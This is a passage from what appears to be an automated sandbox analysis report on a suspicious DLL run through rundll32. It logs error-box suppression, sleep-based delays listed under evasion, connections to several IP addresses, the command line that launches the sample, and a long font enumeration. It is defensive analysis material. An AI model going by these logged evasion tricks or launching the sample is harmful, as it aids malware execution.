                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 625
                        Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 8444
                        Source: C:\Windows\System32\rundll32.exe Window / User API: foregroundWindowGot 1772
                        Source: C:\Windows\System32\loaddll64.exe TID: 5432 Thread sleep time: -120000s >= -30000s
                        Source: C:\Windows\System32\rundll32.exe TID: 7548 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\rundll32.exe TID: 7548 Thread sleep time: -100000s >= -30000s
                        Source: C:\Windows\System32\rundll32.exe TID: 1188 Thread sleep time: -219000s >= -30000s
                        Source: C:\Windows\System32\rundll32.exe TID: 1188 Thread sleep time: -8444000s >= -30000s
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
                        Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 100000
                        Source: C:\Windows\System32\rundll32.exe Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\System32\rundll32.exe Network Connect: 104.26.12.205 80
                        Source: C:\Windows\System32\rundll32.exe Network Connect: 88.198.193.213 443
                        Source: C:\Windows\System32\rundll32.exe Network Connect: 3.33.130.190 80
                        Source: C:\Windows\System32\rundll32.exe Network Connect: 34.120.206.254 443
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                        Source: rundll32.exe, rundll32.exe, 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: Shell_TrayWnd
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
